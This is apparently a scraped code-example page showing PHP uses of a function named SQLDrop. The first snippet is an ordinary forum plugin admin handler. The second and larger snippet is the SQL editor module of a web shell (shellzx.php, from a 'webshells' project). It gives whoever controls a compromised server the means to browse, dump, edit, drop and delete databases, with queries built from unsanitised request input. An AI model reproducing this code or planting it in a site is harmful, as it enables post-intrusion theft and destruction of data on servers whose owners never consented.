예제 #1
0
            	$navMenu->setupnav('hack_'.$key);
            }
            */
            $db_hackdb[$key] = array(stripslashes($value), $key);
        }
    }
    setConfig('db_hackdb', $db_hackdb);
    updatecache_c();
    //$navMenu->cache();
    adminmsg('operate_success');
} elseif ($action == 'delete') {
    InitGP(array('id'));
    empty($db_hackdb[$id]) && adminmsg('hackcenter_del');
    unset($db_hackdb[$id]);
    $sqlarray = file_exists(R_P . "hack/{$id}/sql.txt") ? FileArray($id) : array();
    !empty($sqlarray) && SQLDrop($sqlarray);
    setConfig('db_hackdb', $db_hackdb);
    $navMenu = L::loadClass('navmenu');
    $navMenu->settype('bbs_navinfo');
    $navMenu->del('hack_' . $id);
    $navMenu->cache();
    adminmsg('operate_success');
} elseif ($action == 'add') {
    InitGP(array('hackdir', 'hackname', 'hackopen'), 'G');
    !empty($db_hackdb[$hackdir]) && adminmsg('hackcenter_sign_exists');
    $sqlarray = file_exists(R_P . "hack/{$hackdir}/sql.txt") ? FileArray($hackdir) : array();
    !empty($sqlarray) && SQLCreate($sqlarray);
    $db_hackdb[$hackdir] = array($hackname, $hackdir, $hackopen);
    setConfig('db_hackdb', $db_hackdb);
    $navMenu = L::loadClass('navmenu');
    $navMenu->settype('bbs_navinfo');
예제 #2
0
파일: shellzx.php 프로젝트: Theov/webshells
function SQLEditor()
{
    extract($_SESSION);
    $conn = @mysql_connect($mhost . ":" . $mport, $muser, $mpass);
    if ($conn) {
        echo "Logged in as {$muser}@{$mhost} <a href='{$self}?act=logout'>[Logout]</a><center>";
        echo "<form method='POST' action='{$self}?'>\n            Quick SQL query: <input type='text' style='width: 300px' value='select * from users' name='sqlquery'>\n            <input type='hidden' name='db' value='{$_GET['db']}'>\n            <input type='submit' value='Go' name='sql'>\n            </form>";
        echo "<form action='{$self}?act=sqledit' method='post'>\n            <input type='submit' style='border: none;' value='[ List Processes ]' name='sql_list_proc'>\n            </form></center></br></br>";
        if (isset($_POST['sql_list_proc'])) {
            $res = mysql_list_processes();
            echo "<table style='margin: auto; text-align: center;'><tr>\n                <td>Proc ID</td><td>Host</td><td>DB</td><td>Command</td><td>Time</td>\n                </tr>";
            while ($r = mysql_fetch_assoc($res)) {
                echo "<tr><td>{$r['Id']}</td><td>{$r['Host']}</td><td>{$r['db']}</td><td>{$r['Command']}</td><td>{$r['Time']}</td></tr>";
            }
            mysql_free_result($res);
            echo "</table></br>";
        }
        if (!isset($_GET['db'])) {
            if (isset($_POST['dbc'])) {
                db_create();
            }
            if (isset($_GET['dropdb'])) {
                SQLDrop();
            }
            echo "<table style='margin: auto; text-align: center;'>\n            <tr><td>Database</td><td>Table count</td><td>Download</td><td>Drop</td></tr>";
            $all_your_base = mysql_list_dbs($conn);
            while ($your_base = mysql_fetch_assoc($all_your_base)) {
                $tbl = mysql_query("SHOW TABLES FROM {$your_base['Database']}");
                $tbl_count = mysql_num_rows($tbl);
                echo "<tr><td><a href='{$self}?act=sqledit&db={$your_base['Database']}'>{$your_base['Database']}</td><td>{$tbl_count}</td><td><a href='{$self}?act=download&db={$your_base['Database']}'>Download</a></td><td><a href='{$self}?act=sqledit&dropdb={$your_base['Database']}'>Drop</a></td></tr>";
            }
            echo "</table></br><center><form action='{$self}?act=sqledit' method='post'>New database name: <input type='text' value='new_database' name='db_name'><input type='submit' style='border: none;' value='[ Create Database ]' name='dbc'></form></center></br>";
        } elseif (isset($_GET['db']) && !isset($_GET['tbl'])) {
            if (isset($_POST['tblc'])) {
                table_create();
            }
            if (isset($_GET['droptbl'])) {
                SQLDrop();
            }
            echo "<table style='margin: auto; text-align: center;'>\n            <tr><td>Table</td><td>Column count</td><td>Dump</td><td>Drop</td></tr>";
            $tables = mysql_query("SHOW TABLES FROM {$_GET['db']}");
            while ($tblc = mysql_fetch_array($tables)) {
                $fCount = mysql_query("SHOW COLUMNS FROM {$_GET['db']}.{$tblc['0']}");
                $fc = mysql_num_rows($fCount);
                echo "<tr><td><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$tblc['0']}'>{$tblc['0']}</a></td><td>{$fc}</td><td><a href='{$self}?act=download&db={$_GET['db']}&tbl={$tblc['0']}'>Dump</td><td><a href='{$self}?act=sqledit&db={$_GET['db']}&droptbl={$tblc['0']}'>Drop</a></td></tr>";
            }
            echo "</table></br><center><form action='{$self}?act=sqledit&db={$_GET['db']}' method='post'>Create new table: <input type='text' value='new_table' name='table_name'><input type='hidden' value='{$_GET['db']}' name='db_current'> <input type='submit' style='border: none;' value='[ Create Table ]' name='tblc'></form></center>";
        } elseif (isset($_GET['field']) && isset($_POST['sqlsave'])) {
            $discard_values = mysql_query("SELECT * FROM {$_GET['db']}.{$_GET['tbl']} WHERE {$_GET['field']}='{$_GET['v']}'");
            $values = mysql_fetch_assoc($discard_values);
            $keys = array_keys($values);
            $values = array();
            foreach ($_POST as $k => $v) {
                if (in_array($k, $keys)) {
                    $values[] = $v;
                }
            }
            $query = "UPDATE {$_GET['db']}.{$_GET['tbl']} SET ";
            for ($y = 0; $y < count($values); $y++) {
                if ($y == count($values) - 1) {
                    $query .= "{$keys[$y]}='{$values[$y]}' ";
                } else {
                    $query .= "{$keys[$y]}='{$values[$y]}', ";
                }
            }
            $query .= "WHERE {$_GET['field']} = '{$_GET['v']}'";
            $try = mysql_query($query) or die(mysql_error());
            echo "<center>Table updated!<br>";
            echo "<a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}'>Go back</a><br><br>";
        } elseif (isset($_GET['field']) && isset($_GET['v']) && !isset($_GET['del'])) {
            echo "<center><form action='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&field={$_GET['field']}&v={$_GET['v']}' method='post'>";
            $sql_fields = array();
            $fields = mysql_query("SHOW COLUMNS FROM {$_GET['db']}.{$_GET['tbl']}");
            while ($field = mysql_fetch_assoc($fields)) {
                $sql_fields[] = $field['Field'];
            }
            $data = mysql_query("SELECT * FROM {$_GET['db']}.{$_GET['tbl']} WHERE {$_GET['field']}='{$_GET['v']}'");
            $d_piece = mysql_fetch_assoc($data);
            for ($m = 0; $m < count($sql_fields); $m++) {
                $point = $sql_fields[$m];
                echo "{$point}: <input type='text' value='{$d_piece[$point]}' name='{$sql_fields[$m]}'></br>";
            }
            echo "<input type='submit' value='Save' name='sqlsave'></form></center>";
        } elseif (isset($_GET['db']) && isset($_GET['tbl'])) {
            if (isset($_GET['insert'])) {
                SQLInsert();
            }
            if (isset($_GET['field']) && isset($_GET['v']) && isset($_GET['del'])) {
                echo "<center>";
                if (@mysql_query("DELETE FROM {$_GET['db']}.{$_GET['tbl']} WHERE {$_GET['field']}={$_GET['v']}")) {
                    echo "Row deleted</br>";
                } else {
                    echo "Failed to delete row</br>";
                }
                echo "</center>";
            }
            echo "<center><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&insert=1'>[Insert new row]</a></center>";
            echo "<table style='margin: auto; text-align: center;'><tr>";
            $cols = mysql_query("SHOW COLUMNS FROM {$_GET['db']}.{$_GET['tbl']}");
            $fields = array();
            while ($col = mysql_fetch_assoc($cols)) {
                array_push($fields, $col['Field']);
                echo "<td>{$col['Field']}</td>";
            }
            echo "</tr>";
            if (isset($_GET['s']) && is_numeric($_GET['s'])) {
                $selector = mysql_query("SELECT * FROM {$_GET['db']}.{$_GET['tbl']} LIMIT {$_GET['s']}, 250");
            } else {
                $selector = mysql_query("SELECT * FROM {$_GET['db']}.{$_GET['tbl']} LIMIT 0, 250");
            }
            while ($select = mysql_fetch_row($selector)) {
                echo "<tr>";
                for ($i = 0; $i < count($fields); $i++) {
                    echo "<td>" . htmlspecialchars($select[$i]) . "</td>";
                }
                echo "<td><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&field={$fields['0']}&v={$select['0']}'>Edit</a></td><td><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&field={$fields['0']}&v={$select['0']}&del=true'>Delete</a></td>";
                echo "</tr>";
            }
            echo "</table>";
            echo "<table style='margin: auto;'>";
            if (isset($_GET['s'])) {
                $prev = intval($_GET['s']) - 250;
                $next = intval($_GET['s']) + 250;
                if ($_GET['s'] > 0) {
                    echo "<tr><td><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&s={$prev}'>Previous</a></td>";
                }
                if (mysql_num_rows($selector) > 249) {
                    echo "<td><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&s={$next}'>Next</a></td></tr>";
                }
            } else {
                echo "<center><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&s=250'>Next</a></center>";
            }
            echo "</table>";
        } else {
            $_SESSION = array();
            session_destroy();
            header("Location: {$self}?act=sql");
        }
    }
}